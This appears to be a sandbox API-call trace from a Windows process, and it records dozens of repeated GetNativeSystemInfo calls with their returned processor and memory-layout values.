	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.543] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.543] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.543] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.543] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.543] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.543] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.543] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.543] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.543] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.543] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.543] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.545] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.545] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.545] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.545] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.545] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.545] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.545] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.545] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.545] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.545] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.545] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.546] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.547] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.548] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.548] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.548] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.548] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.548] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.548] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.548] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.548] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.548] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.548] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.548] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.549] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.549] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.549] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.549] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.549] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
